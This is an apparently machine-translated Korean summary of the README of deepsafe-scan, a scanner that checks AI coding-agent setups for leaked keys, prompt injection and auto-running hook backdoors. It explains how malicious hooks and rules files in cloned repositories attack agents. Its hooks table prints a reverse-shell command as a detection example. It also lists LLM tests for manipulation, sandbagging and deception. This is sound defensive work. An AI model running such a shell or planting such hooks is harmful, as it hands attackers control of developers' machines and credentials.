본문으로 건너뛰기

© 2026 Molayo

GitHub요약2026. 06. 01. 21:59

XiaoYiWeio/deepsafe-scan

요약

DeepSafe Scan은 AI Agent 환경을 보호하기 위한 범용 보안 사전 점검 스캐너입니다. API 키 유출, 프롬프트 주입, 백도어 공격 등 5가지 차원의 보안 위협을 탐지하여 안전한 AI 개발 환경을 제공합니다.

핵심 포인트

  • API 키 유출 및 프롬프트 주입 공격 방어
  • Claude Code, Cursor 등 주요 AI 에이전트 지원
  • 설정 파일 및 메모리 내 민감 정보 정적 분석
  • LLM 기반의 행동 보안 및 환각 탐지 기능

AI Agent 환경 범용 보안 사전 점검 스캐너

실행 전 먼저 스캔하세요. 단 한 줄의 명령어로 당신의 AI Agent 환경을 키(Key) 유출, 프롬프트 주입 (Prompt Injection), Hooks 백도어 공격으로부터 보호합니다.

이러한 공격들이 어떻게 작동하는지 알고 싶으신가요? → AI Agent Attack Techniques

⚡ 공격자는 단 3초 만에 당신의 AI Agent 환경에서 SSH Key, API Key 및 모든 민감한 자격 증명을 훔칠 수 있습니다.

↓ 실제 공격 시연 (3배속) · 전체 원본 속도 영상 보기 →

당신이 다음에 클론(clone)할 저장소는, 어쩌면 당신이 열어주기만을 기다리고 있을지도 모릅니다.

지원 플랫폼:

OpenClaw

Claude Code

Cursor

Codex

OpenCode

DeepSafe Scan은 AI가 생성한 코드를 실행하거나 새로운 스킬(Skills)을 설치하기 전에 5가지 차원에서 **보안 사전 점검 (Security Pre-check)**을 수행합니다:

모듈탐지 내용API 필요 여부?
postureopenclaw.json / .env — 안전하지 않은 게이트웨이 설정, 노출된 키아니요
skill설치된 Skills 및 MCP 서버 — 15개 이상의 정적 분석기 (키, 위험한 호출, eval, 데이터 유출)아니요 (LLM 선택 사항)
memory세션 및 메모리 파일 — 27가지 키 패턴, 9가지 PII(개인정보) 유형, 프롬프트 주입 (Prompt Injection)아니요
hooks.claude/settings.json, .cursorrules, .windsurfrules, opencode.json, .opencode/agents/, .opencode/commands/, .vscode/tasks.json, CLAUDE.md, AGENTS.md — 12가지 주입 패턴아니요
model4가지 행동 보안 탐지: 조작 유도, 능력 은닉, 기만적 답변, 환각 (Hallucination) 생성

4개의 정적 모듈은 어떠한 API Key도 필요 없이 실행 가능합니다. LLM 기능은 기존 자격 증명을 자동으로 탐지하므로 수동 설정이 필요 없습니다.

AI 프로그래밍 Agent (Claude Code, Cursor, Windsurf, Codex)의 설정 파일은 명령어 자동 실행을 지원합니다. 공격자는 오픈소스 저장소에 악성 설정을 심어둘 수 있습니다:

공격 벡터트리거 시점사용자 확인 필요?
.claude/settings.local.json SessionStart hooksClaude Code 시작 시아니요, 자동 실행
.vscode/tasks.json runOn: folderOpenCursor/VSCode 디렉토리 오픈 시아니요, 자동 실행
.cursorrules / .windsurfrules / opencode.json / .opencode/agents/ / CLAUDE.md / AGENTS.mdAgent가 읽고 명령을 실행할 가능성 있음일부 상황에서 자동

한 줄 설치, 한 문장 사용으로, 이제 클론(clone)할 때 무방비 상태로 노출되지 마세요.

clawhub install deepsafe-scan

설치 후, AI Agent에게 자연어로 직접 말하세요:

"deepsafe scan을 사용해서 이 프로젝트를 스캔해줘"

Agent가 자동으로 스캔하고 보고서를 반환하며, 어떠한 명령어도 외울 필요가 없습니다.

Claude Code 사용자 — CLAUDE.md를 프로젝트 루트 디렉토리에 복사하면 통합됩니다: cp ~/deepsafe-scan/CLAUDE.md /your/project/

git clone https://github.com/XiaoYiWeio/deepsafe-scan ~/deepsafe-scan
python3 ~/deepsafe-scan/scripts/scan.py \
--modules hooks \
...

Python 코어는 오직 표준 라이브러리만을 사용합니다: urllib, json, re, hashlib, subprocess, concurrent.futures, argparse, dataclasses.

pip install이 필요하지 않습니다.

플랫폼API 자동 탐지Hooks 스캔Skills 스캔설명
OpenClaw~/.openclaw/openclaw.json 읽기완전한 네이티브 지원
Claude CodeANTHROPIC_API_KEY.claude/settings.json✅ 임의 디렉토리Claude Hooks 파일 검사
CursorOPENAI_API_KEY (설정된 경우).cursorrules✅ 임의 디렉토리모델 탐지를 위해 사용자 Key 필요
CodexOPENAI_API_KEYAGENTS.md✅ 임의 디렉토리Key 없이도 완전한 정적 스캔 가능
WindsurfOPENAI_API_KEY (설정된 경우).windsurfrules✅ 임의 디렉토리Windsurf 설정 파일 검사
OpenCodeANTHROPIC_API_KEY / OPENAI_API_KEYopencode.json, .opencode/✅ 임의 디렉토리OpenCode 설정, agents 및 commands 검사
기타--api-base / --api-key모든 OpenAI 형식 API와 호환
deepsafe-scan/
├── scripts/
│ ├── scan.py # 메인 엔트리포인트 (5개 모듈, HTML/markdown/JSON 출력)
...

AI Agent 배포 설정을 검사합니다:

  • 안전하지 않은 게이트웨이 인증 (평문 HTTP, 인증 없음, 기본 비밀번호)
  • 설정 파일에 노출된 API Keys
  • 과도하게 넓은 권한의 보안 설정
  • 프로덕션 환경에서 활성화된 디버그 모드

OpenClaw 사용자는 openclaw.json을 읽고, 다른 플랫폼은 .env, config.json 등을 검사합니다.

설치된 모든 Skills 및 MCP 서버 디렉토리를 스캔하여 다음을 탐지합니다:

  • 하드코딩된 키 (27가지 패턴 — API Keys, Token, 비밀번호)
  • 원격 코드 실행 (RCE) 패턴 (eval, exec, 사용자 입력이 포함된 subprocess)
  • 데이터 유출 (curl/wget/requests를 통한 외부 호스트로의 전송)
  • 시스템 프롬프트 내의 프롬프트 인젝션 (Prompt Injection) 시도
  • 위험한 파일 작업, 셸 인젝션 (Shell Injection), 경로 탐색 (Path Traversal)

선택 사항: LLM 시맨틱 분석 (Semantic Analysis)을 통해 복잡한 난독화 패턴을 발견할 수 있습니다.

세션 로그 및 Agent 메모리 파일을 스캔합니다:

27가지 키 패턴: OpenAI Key, Anthropic Key, GitHub Token, AWS 자격 증명, Slack, Stripe, 데이터베이스 URL, SSH Key, JWT Secret
9가지 PII(개인정보) 유형: 이메일, 전화번호 (국제 형식), SSN, 여권, 신용카드 (Luhn 검증), 의료 코드, 운전면허증, 은행 계좌, 신분증
프롬프트 인젝션 (Prompt Injection): 탈옥 (Jailbreak) 조각, 역할 덮어쓰기 시도, 지시 사항 덮어쓰기

AI 프로그래밍 어시스턴트 설정 파일 내의 커맨드 인젝션 (Command Injection) 백도어를 스캔합니다:

패턴심각도예시
리버스 셸 (Reverse Shell)CRITICALbash -i >& /dev/tcp/10.0.0.1/4444 0>&1
...

검사 파일: .claude/settings.json, .claude/settings.local.json, .cursorrules, .cursor/rules.md, .windsurfrules, .windsurf/rules.md, opencode.json, opencode.jsonc, .opencode/agents/, .opencode/commands/, .vscode/tasks.json, .vscode/settings.json, .github/copilot-instructions.md, CLAUDE.md, AGENTS.md.

4가지 행동 보안 평가 (LLM API 호출):

탐지 항목테스트 내용
조작 유도모델이 조작되어 사용자의 관점을 변경할 수 있는지
능력 은닉모델이 실제 능력을 숨기기 위해 의도적으로 성능을 낮게 보이는지
기만적 답변직접적인 질문을 받았을 때 모델이 허위 정보를 제공하는지
환각 생성모델이 검증 불가능한 사실을 날조하는지

각 탐지(detection) 실행은 일련의 소규모 평가를 수행하며, 0–100 사이의 안전 점수(safety score)를 반환합니다.

python3 scripts/scan.py [옵션]
핵심 옵션:
--modules 쉼표로 구분: posture,skill,memory,hooks,model
...
총점위험 등급권장 조치
85–100🟢 저위험사용 가능
...

자격 증명(credentials)은 다음 우선순위에 따라 자동으로 파싱됩니다:

--api-base / --api-key 파라미터
↓ (설정되지 않은 경우)
OpenClaw 게이트웨이 (~/.openclaw/openclaw.json)
...

Cursor 사용자: Cursor는 내부 관리 LLM 인증을 구독함으로써 API Key가 자식 프로세스(child process)에 노출되지 않도록 합니다. Model 탐지를 활성화하려면 Shell에서 OPENAI_API_KEY를 설정하거나 --api-key를 전달하십시오. 모든 정적 모듈(static modules)은 어떠한 Key도 필요하지 않습니다.

항목위치
ai-agent-attack-techniques공격 기술 참조 매뉴얼 — deepsafe-scan이 탐지하는 공격의 구체적인 원리와 PoC(Proof of Concept)를 기록함

Issue 및 PR 제출을 환영합니다: github.com/XiaoYiWeio/deepsafe-scan

📖 온라인 문서 · 문제 피드백 · OpenClaw 생태계

DeepSafe Scan은 OpenClaw 생태계의 일부인 동시에 독립적으로 사용할 수 있는 보안 도구이며, 모든 주요 AI 프로그래밍 에이전트(Agent)를 지원합니다.

AI 자동 생성 콘텐츠

본 콘텐츠는 GitHub Codex tools의 원문을 AI가 자동으로 요약·번역·분석한 것입니다. 원 저작권은 원저작자에게 있으며, 정확한 내용은 반드시 원문을 확인해 주세요.

원문 바로가기
0

댓글

0